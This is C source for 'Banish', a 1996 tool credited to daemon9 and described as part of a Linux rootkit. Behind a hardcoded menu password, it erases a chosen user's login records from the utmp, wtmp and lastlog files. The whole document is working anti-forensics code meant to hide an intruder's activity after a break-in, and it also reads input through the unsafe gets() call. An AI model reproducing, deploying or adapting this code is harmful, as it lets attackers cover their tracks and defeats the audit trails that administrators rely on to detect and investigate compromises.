/*
		Banish
	Erase yur presence from the utmp, wtmp, and lastlog.
	This tool is part of the demonKit for Linux.
	daemon9 1996, the Guild

*/

#include <stdio.h>
#include <utmp.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <lastlog.h>
#include <pwd.h>
 
#define WTMP "/var/adm/wtmp"
#define UTMP "/var/adm/utmp"
#define LASTLOG "/var/adm/lastlog"

int retcode=0;

void main(argc,argv)
int  argc;
char *argv[];
{
	int banishTmp(char *,char *,int,int);
	int banishLastlog(char *);
	char demon[10];
	char line[8];
	int howmany;
	demon[0]='d';
	demon[1]='3';	/* change this, you jerk */
	demon[2]='m';
	demon[3]='0';
	demon[4]='n';
	demon[5]='\0';

	if(argc!=3){
		printf("invalid argument list\n");
		exit(0);
	}
	if(!strcmp(argv[1],demon)){
		printf("\t\tBanishment Menu\n");	
		printf("\t\t%s's fate?\n",argv[2]); 		
		printf("\t\t# - banish last # records\n");
		printf("\t\tALL - banish ALL records\n");
		printf("\n\n\n\n\t\tYur choice:");
		gets(line);
		if(line[0]==0x41)howmany=-1;
		else howmany=atoi(line);
        	banishTmp(WTMP,argv[2],howmany,0);
        	banishTmp(UTMP,argv[2],howmany,1);
        	banishLastlog(argv[2]);
		switch(retcode){
			case 0:
				if(howmany>=1)printf("%s banished %d times\n",argv[2],howmany);
				else printf("%s banished entirely\n",argv[2]);
				break;
			case 1:
				printf("u/wtmp banishment error\n");
				break;
			case 2: 
				printf("lastlog banishment error\n");
				break;
			case 3:
				printf("u/wtmp AND lastlog banishment error\n");
				break;
		}
	}
}


 
int banishTmp(name,target,howmany,mode)
char *name, *target;
int howmany;
int mode;
{

	struct utmp utmp_ent;
	int fd,count=0;


	if((fd=open(name,O_RDWR))>=0){
		if(!mode){
     			while(read(fd,&utmp_ent,sizeof(utmp_ent)))if(!strncmp(utmp_ent.ut_name,target,strlen(target)))count++;
			printf("%s has %d records\n",target,count);
			if(count<howmany){
				printf("You want to banish %d records, when there only %d.  This will not work\n",howmany,count);
				retcode++;
				close(fd);
				return;
			}
		}
		lseek(fd,0,SEEK_SET);	/* rewind the stream pointer */
     		while(read(fd,&utmp_ent,sizeof(utmp_ent))&&howmany){
       			if(!strncmp(utmp_ent.ut_name,target,strlen(target))){
				if(!mode)count--;
				if(count+1<=howmany||mode){
					bzero((char *)&utmp_ent,sizeof(utmp_ent));
					lseek(fd,-(sizeof(utmp_ent)),SEEK_CUR);
                 			write(fd,&utmp_ent,sizeof(utmp_ent));
                			howmany--;
				}
			}
		}
     	close(fd);
 	}
	else retcode++;
}
 
int banishLastlog(target)
char *target;
{
   	struct passwd *pwd;
    	struct lastlog ltoken;
	int fd; 

	if((pwd=getpwnam(target))){
 		if((fd=open(LASTLOG,O_RDWR))>=0){
            		lseek(fd,(long)pwd->pw_uid*sizeof(struct lastlog),0);
            		bzero((char *)&ltoken,sizeof(ltoken));
            		write(fd,(char *)&ltoken,sizeof(ltoken));
            		close(fd);
        	} 
    	}
	else retcode++;
}

